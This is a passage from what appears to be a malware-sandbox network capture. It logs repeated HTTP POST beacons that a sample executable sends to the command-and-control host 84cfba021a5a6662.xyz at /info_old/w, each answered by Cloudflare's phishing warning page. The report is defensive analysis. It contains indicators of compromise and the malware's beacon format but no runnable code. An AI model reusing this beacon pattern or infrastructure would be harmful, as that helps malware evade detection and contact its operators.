                                                                                                                                                    Data Ascii: ewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' h
                                                                                                                                                    Jan 29, 2021 17:36:38.444089890 CET114INData Raw: 20 74 77 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20
                                                                                                                                                    Data Ascii: two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretend
                                                                                                                                                    Jan 29, 2021 17:36:38.444117069 CET115INData Raw: 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72
                                                                                                                                                    Data Ascii: </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13
                                                                                                                                                    Jan 29, 2021 17:36:38.444150925 CET116INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:38.555047035 CET116OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.555078983 CET116OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 66 78 4e 35 6f 4e 75 36 76 6c 79 6e 59 4c 33 50 36 4d 6f 6b 5f 77 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
                                                                                                                                                    Jan 29, 2021 17:36:38.608758926 CET118INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0c3f00004c7a989ee000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DNXVjPu5uwOmj99TlOOlAhMHoU%2F5YEqSEKFA8SUaJnYFWZXV0KUhm8zsKTx5eNn0ZKjJppKl8FGwSslOHQla1m%2BkGiweMsOpYugdajbxJfYjsXN%2FOg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8d3fd04c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                    Jan 29, 2021 17:36:38.608782053 CET119INData Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74
                                                                                                                                                    Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
                                                                                                                                                    Jan 29, 2021 17:36:38.609302998 CET121INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
                                                                                                                                                    Jan 29, 2021 17:36:40.871623993 CET149OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:40.871685028 CET149OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 54 4d 71 79 52 4d 68 73 6f 6e 31 65 67 6a 71 6c 6f 6c 4a 54 6b 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
                                                                                                                                                    Jan 29, 2021 17:36:40.932384968 CET150INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d62a03f41afb9e90cff91933b2a7bb33a1611938200; expires=Sun, 28-Feb-21 16:36:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a154f00004c7ae8157000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cuqf45jSp%2Bm%2F3k0sv4SqMBJcKL7rdKkeo73x6od7TLqTgJ2Xnh4uuFmcj8wx7JbDVqLdNq%2Bs8VpaHSE7CEV5Yw8A77L2yb0UxxYccLy5T1q4VLIPgQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f9bbcda4c7a-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.2.649729104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:36:46.603761911 CET168OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:46.603826046 CET168OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 5a 71 41 6c 37 6f 41 47 6b 49 49 72 67 68 6a 57 58 33 49 71 4c 4d 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVZqAl7oAGkIIrghjWX3IqLM~
                                                                                                                                                    Jan 29, 2021 17:36:46.695880890 CET170INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d24bdaf5c7addfa487e548b267849589e1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2bb10000c7714b022000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3WbUPNX0Q33l2fVJSYmLl0c0RPUwHvKFKwstASSbw4zStXrHdk7pR3qp9oXUJqZaHDIplqJGYjfYpfH3VAWB6bDXWgOVgqa6bDpzhIhib1vgGJngsw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fbf8d11c771-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
                                                                                                                                                    Jan 29, 2021 17:36:46.696003914 CET171INData Raw: 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63
                                                                                                                                                    Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
                                                                                                                                                    Jan 29, 2021 17:36:46.696084023 CET173INData Raw: 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
                                                                                                                                                    Jan 29, 2021 17:36:46.696126938 CET174INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 73 65 63 74 69 6f 6e 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 66 6f 6f 74 65 72 20 63
                                                                                                                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
                                                                                                                                                    Jan 29, 2021 17:36:46.696902990 CET174INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
                                                                                                                                                    Jan 29, 2021 17:36:49.255383968 CET181OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:49.255412102 CET181OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 76 50 6e 4c 71 30 6a 53 62 4a 64 41 33 55 69 37 66 4d 79 72 38 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTvPnLq0jSbJdA3Ui7fMyr8~
                                                                                                                                                    Jan 29, 2021 17:36:49.311367989 CET183INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:49 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=dfd1543d618807c76cb51baef504b58491611938209; expires=Sun, 28-Feb-21 16:36:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a360d0000c7713abc2000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kDBDa3O4gcjQHx7SddhRGwqhUKmFKuFOCZV61Ca41y3J0daL4CBfi4qULaTcPjYCuwV2Y0FH1mkanoF7BwVd4f1yEU6ywTAC872iBXOU5fJcKuDluw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fd01c9bc771-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 